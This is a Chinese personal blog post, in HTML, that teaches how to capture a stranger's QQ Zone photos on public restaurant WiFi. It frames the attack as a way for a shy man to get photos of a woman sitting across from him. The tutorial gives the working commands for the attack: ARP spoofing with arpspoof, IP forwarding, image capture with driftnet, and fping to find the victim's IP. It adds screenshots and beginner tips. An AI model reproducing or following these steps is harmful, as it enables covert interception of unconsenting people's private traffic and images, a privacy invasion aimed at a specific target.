<!DOCTYPE html>
<html lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="JackWang">



<meta name="description" content="Quick Start 场景11.21日上午，小张百无聊赖的去肯德基吃东西，突然看到了一个非常漂亮的妹子就在他对面玩手机。如此优美惬意的环境促使了小张想进一步行动，但是作为宅男的小张，主动搭讪是不可能的，那该怎么办呢？于是乎他拨通了酷哥的手机。。。。。">
<meta name="keywords" content="黑客">
<meta property="og:type" content="article">
<meta property="og:title" content="实战演练|如何在局域网内获取妹子的QQ相册照片？">
<meta property="og:url" content="http://www.wangbing003.top/2019/01/03/局域网内获取妹子的QQ相册照片/index.html">
<meta property="og:site_name" content="JackWang的个人博客">
<meta property="og:description" content="Quick Start 场景11.21日上午，小张百无聊赖的去肯德基吃东西，突然看到了一个非常漂亮的妹子就在他对面玩手机。如此优美惬意的环境促使了小张想进一步行动，但是作为宅男的小张，主动搭讪是不可能的，那该怎么办呢？于是乎他拨通了酷哥的手机。。。。。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://www.wangbing003.top/img/haker/1.png">
<meta property="og:image" content="http://www.wangbing003.top/img/haker/8.png">
<meta property="og:image" content="http://www.wangbing003.top/img/haker/2.png">
<meta property="og:image" content="http://www.wangbing003.top/img/haker/3.png">
<meta property="og:image" content="http://www.wangbing003.top/img/haker/4.png">
<meta property="og:image" content="http://www.wangbing003.top/img/haker/5.png">
<meta property="og:image" content="http://www.wangbing003.top/img/haker/6.png">
<meta property="og:image" content="http://www.wangbing003.top/img/haker/7.png">
<meta property="og:updated_time" content="2019-01-03T08:14:54.709Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="实战演练|如何在局域网内获取妹子的QQ相册照片？">
<meta name="twitter:description" content="Quick Start 场景11.21日上午，小张百无聊赖的去肯德基吃东西，突然看到了一个非常漂亮的妹子就在他对面玩手机。如此优美惬意的环境促使了小张想进一步行动，但是作为宅男的小张，主动搭讪是不可能的，那该怎么办呢？于是乎他拨通了酷哥的手机。。。。。">
<meta name="twitter:image" content="http://www.wangbing003.top/img/haker/1.png">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="JackWang的个人博客" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>实战演练|如何在局域网内获取妹子的QQ相册照片？ | JackWang的个人博客</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script>
        yiliaConfig.jquery_ui = [true, "//cdn.bootcss.com/jqueryui/1.10.4/jquery-ui.min.js", "//cdn.bootcss.com/jqueryui/1.10.4/css/jquery-ui.min.css"];
    </script>



    <script> yiliaConfig.rootUrl = "\/";</script>





    <script>
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?47b3355f30990a8cdc17108f879c202b";
            var s = document.getElementsByTagName("script")[0]; 
            s.parentNode.insertBefore(hm, s);
        })();
    </script>


</head>
</html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">JackWang</a></h1>
        </hgroup>

        
        <p class="header-subtitle">Ordinary life , Unwilling to be ordinary code farmers</p>
        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/archives/">归档</a></li>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:wangbing1027@foxmail.com" title="Email"></a>
                            
                                <a class="fa 新浪微博" href="http://weibo.com/wangbing003" title="新浪微博"></a>
                            
                                <a class="fa CSDN" href="https://blog.csdn.net/qq_37493851" title="CSDN"></a>
                            
                                <a class="fa 博客园" href="https://www.cnblogs.com/" title="博客园"></a>
                            
                                <a class="fa QQ" href="http://wpa.qq.com/msgrd?v=3&uin=1613744953&site=qq&menu=yes" title="QQ"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/hexo/">hexo</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/java/">java</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/黑客/">黑客</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://github.com/lengxi001">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://t.cn/RrXWP6M">PersonalSpace</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://jenkinwang.github.io">JenkinWang</a>
                    
                    </div>
                </section>
                

                
            </div>
        </div>
    </header>                
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">JackWang</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">JackWang</a></h1>
            </hgroup>
            
            <p class="header-subtitle">Ordinary life , Unwilling to be ordinary code farmers</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/archives/">归档</a></li>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:wangbing1027@foxmail.com" title="Email"></a>
                            
                                <a class="fa 新浪微博" target="_blank" href="http://weibo.com/wangbing003" title="新浪微博"></a>
                            
                                <a class="fa CSDN" target="_blank" href="https://blog.csdn.net/qq_37493851" title="CSDN"></a>
                            
                                <a class="fa 博客园" target="_blank" href="https://www.cnblogs.com/" title="博客园"></a>
                            
                                <a class="fa QQ" target="_blank" href="http://wpa.qq.com/msgrd?v=3&uin=1613744953&site=qq&menu=yes" title="QQ"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我">
</nav>
      <div class="body-wrap"><article id="post-局域网内获取妹子的QQ相册照片" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/01/03/局域网内获取妹子的QQ相册照片/" class="article-date">
      <time datetime="2019-01-03T03:23:24.000Z" itemprop="datePublished">2019-01-03</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      实战演练|如何在局域网内获取妹子的QQ相册照片？
    </h1>
  

        
      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/黑客/">黑客</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="Quick-Start-场景"><a href="#Quick-Start-场景" class="headerlink" title="Quick Start 场景"></a>Quick Start 场景</h2><p>11.21日上午，小张百无聊赖的去肯德基吃东西，突然看到了一个非常漂亮的妹子就在他对面玩手机。如此优美惬意的环境促使了小张想进一步行动，但是作为宅男的小张，主动搭讪是不可能的，那该怎么办呢？<br>于是乎他拨通了酷哥的手机。。。。。<br><a id="more"></a></p>
<h3 id="酷哥解决"><a href="#酷哥解决" class="headerlink" title="酷哥解决"></a>酷哥解决</h3><p>作为网络界无所不能的酷哥，只思考了五分钟就给小张提出了解决方案。<br>酷哥不仅考虑了小张是一个技术小白的情况，还参考了简单易行的实践可能性。</p>
<h3 id="酷哥方案"><a href="#酷哥方案" class="headerlink" title="酷哥方案"></a>酷哥方案</h3><p>工具：一台笔记本电脑，kali Linux系统</p>
<p>代码：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">arpspoof -i 网卡 -t 目标ip 网关    （提醒：里面的中文汉字需要替换相应的参数）</span><br><span class="line"><span class="built_in">echo</span> 1&gt;/proc/sys/net/ipv4/ip_forward</span><br><span class="line">driftnet</span><br></pre></td></tr></table></figure></p>
<h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><p>一般肯德基里面都有免费的WiFi，我们把笔记本连上WiFi<br>打开kali Linux系统。进行arp欺骗，arp欺骗是什么意思呢？就是欺骗用户与服务器，让用户误认为你是服务器，进而达到截取流量的目前，让用户IP的流量经过我的网卡再经过网关，我们就可以在网关处截获流量信息了，截获了流量就可以看到对方浏览手机的信息了，如果妹子在玩QQ刷空间，我们就理所当然的获取了她QQ空间里的照片了。（想要详细了解arp欺骗可以自行百度百科）</p>
<h3 id="步骤"><a href="#步骤" class="headerlink" title="步骤"></a>步骤</h3><p>打开kali Linux终端：<br><img src="/img/haker/1.png"> </p>
<p>输入断网代码：arpspoof -i 网卡 -t 目标ip 网关    （提醒：里面的中文汉字需要替换相应的参数）。输入后，对方的电脑/手机会断网，我们要快速输入下面这个代码，对方就可以重新上网，但是流量会经过我的网卡。<br>断网攻击后，进行流量分发，输入代码：echo 1&gt;/proc/sys/net/ipv4/ip_forward<br>按回车键，会出现下面这个界面。<br><img src="/img/haker/8.png"> </p>
<p>然后输入代码：driftnet  -i eth0(最后是零不是偶）意思就是获取经过本机网卡流量的图片，我们会看到下面会出现一个黑框，那里面就会出现图片。<br><img src="/img/haker/2.png"> </p>
<p>好了，我们测试一下：<br><img src="/img/haker/3.png"> </p>
<p>上面是打开的QQ空间时的状态，我们可以看到一些图片，下面这张图是我们的电脑正在截获的图片，由于受网络的影响，还没有全部加载完毕，所以我看到的是部分图片。<br><img src="/img/haker/4.png"> </p>
<p>可见，如果妹子打开了她的空间相册，我们是可以截获她的空间照片的，这里我们不管她有没有设置什么密码验证，只要她打开了就可以截获，除此之外，如果妹子在给好友发送照片，我们也是有可能截获的哟。<br>这个技能你get到了没？</p>
<h2 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h2><p>怎么在同一局域网内获取对方的网关，IP？<br>网关，我们可以在自己的电脑里面按：win+r 键，输入：cmd进入命令行。<br>然后如何ipconfig 就可以看到网关了，<br>提醒：一般同一局域网下的电脑网关相同；<br><img src="/img/haker/5.png"> </p>
<h3 id="怎么找妹子的IP呢"><a href="#怎么找妹子的IP呢" class="headerlink" title="怎么找妹子的IP呢"></a>怎么找妹子的IP呢</h3><p>在kali Linux系统输入：fping -asg xxx.xxx.xx.0/24按回车键即可【xxx.xxx.xx.0 代表你的IPv4，把你的IP地址最后一位换成0，然后加个/24<br>举例：我的ipv4是：192.168.11.78<br>我就要写：192.168.11.0】<br>下面出来了三个，我们排查一个哪个是自己的，第一个 是网关，所以就剩下妹子的了，以后会详细告诉大家IP比较多的时候怎么排查。<br><img src="/img/haker/6.png"> </p>
<h3 id="网卡是什么"><a href="#网卡是什么" class="headerlink" title="网卡是什么"></a>网卡是什么</h3><p>打开kali Linux系统，输入ifconfig<br>可以看到网卡是eth0（最后是零不是偶）<br><img src="/img/haker/7.png"> </p>
<p>怎么样是不是简单易行？如果你第一遍没看懂，不要紧多看看，多试试就能成功的，建议小白可以在自己家的WiFi下测试，自己搭建一个场景进行学习？<br>ps：如果你对我所作的教程表示一脸茫然，建议你们先去了解虚拟机和Linux系统，以及如何在虚拟机中装Linux系统和一些基本命令<br>在这里为了方便大家学习，给大家分享这一系列教学:<a href="http://www.herojd.com/search.php?mod=forum&amp;searchid=1&amp;orderby=lastpost&amp;ascdesc=desc&amp;searchsubmit=yes&amp;kw=linux" target="_blank" rel="noopener">立即前往</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/01/03/局域网内获取妹子的QQ相册照片/">实战演练|如何在局域网内获取妹子的QQ相册照片？</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">JackWang</a></p>
        <p><span>发布时间:</span>2019-01-03, 11:23:24</p>
        <p><span>最后更新:</span>2019-01-03, 16:14:54</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/01/03/局域网内获取妹子的QQ相册照片/" title="实战演练|如何在局域网内获取妹子的QQ相册照片？">http://www.wangbing003.top/2019/01/03/局域网内获取妹子的QQ相册照片/</a>
            <span class="copy-path" data-clipboard-text="原文: http://www.wangbing003.top/2019/01/03/局域网内获取妹子的QQ相册照片/　　作者: JackWang" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target="_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2019/01/04/Java获取本机Mac/">
                    Java获取本机Mac
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2019/01/01/短信登入/">
                    短信验证登入实现
                </a>
            </div>
        
    </nav>

  
</article>




    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Start-场景"><span class="toc-number">1.</span> <span class="toc-text">Quick Start 场景</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#酷哥解决"><span class="toc-number">1.1.</span> <span class="toc-text">酷哥解决</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#酷哥方案"><span class="toc-number">1.2.</span> <span class="toc-text">酷哥方案</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#思路"><span class="toc-number">1.3.</span> <span class="toc-text">思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#步骤"><span class="toc-number">1.4.</span> <span class="toc-text">步骤</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#补充"><span class="toc-number">2.</span> <span class="toc-text">补充</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#怎么找妹子的IP呢"><span class="toc-number">2.1.</span> <span class="toc-text">怎么找妹子的IP呢</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#网卡是什么"><span class="toc-number">2.2.</span> <span class="toc-text">网卡是什么</span></a></li></ol></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    

    
</div>







    
        <!-- 来必力City版安装代码 -->
<div id="lv-container" data-id="city" data-uid="MTAyMC80MTk1My8xODQ5OQ==">
    <script type="text/javascript">
       (function(d, s) {
           var j, e = d.getElementsByTagName(s)[0];
    
           if (typeof LivereTower === 'function') { return; }
    
           j = d.createElement(s);
           j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
           j.async = true;
    
           e.parentNode.insertBefore(j, e);
       })(document, 'script');
    </script>
    <noscript>为正常使用来必力评论功能请激活JavaScript</noscript>
    </div>
    <!-- City版安装代码已完成 -->      
    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/01/04/Java获取本机Mac/" title="上一篇: Java获取本机Mac">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2019/01/01/短信登入/" title="下一篇: 短信验证登入实现">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/01/04/Java获取本机Mac/">Java获取本机Mac</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/03/局域网内获取妹子的QQ相册照片/">实战演练|如何在局域网内获取妹子的QQ相册照片？</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/短信登入/">短信验证登入实现</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/31/hello-world/">Hexo介绍</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
        </script>
       
          <span id="busuanzi_container_page_pv">
                本文总阅读量<span id="busuanzi_value_page_pv"></span>次
              </span>
              <p></p>
              <span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
    var now = new Date(); 
    function createtime() { 
        var grt= new Date("12/30/2018 12:49:00");//此处修改你的建站时间或者网站上线时间 
        now.setTime(now.getTime()+250); 
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days); 
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours); 
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum); 
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;} 
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum); 
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;} 
        document.getElementById("timeDate").innerHTML = "本站已安全运行 "+dnum+" 天 "; 
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒"; 
    } 
setInterval("createtime()",250);
</script>

    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2018-2019 JackWang
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/lengxi001/JackWang" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by JackWang 
            </div>
        </div>
        
            <div class="visit">
                
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit" title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
    <script src="/js/GithubRepoWidget.js"></script>

<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 6;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





    <script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.6.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>


<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
+</script>
+<script type="text/javascript" src="/resources/love.js"></script>
+<script type="text/javascript" src="/resources/float.js"></script>
+<script type="text/javascript" src="/resources/typewriter.js"></script>
<script type="text/javascript" color="0,104,183" opacity="1" zindex="-1" count="50" src="/resources/particle.js"></script>
  </div>
</body>
</html>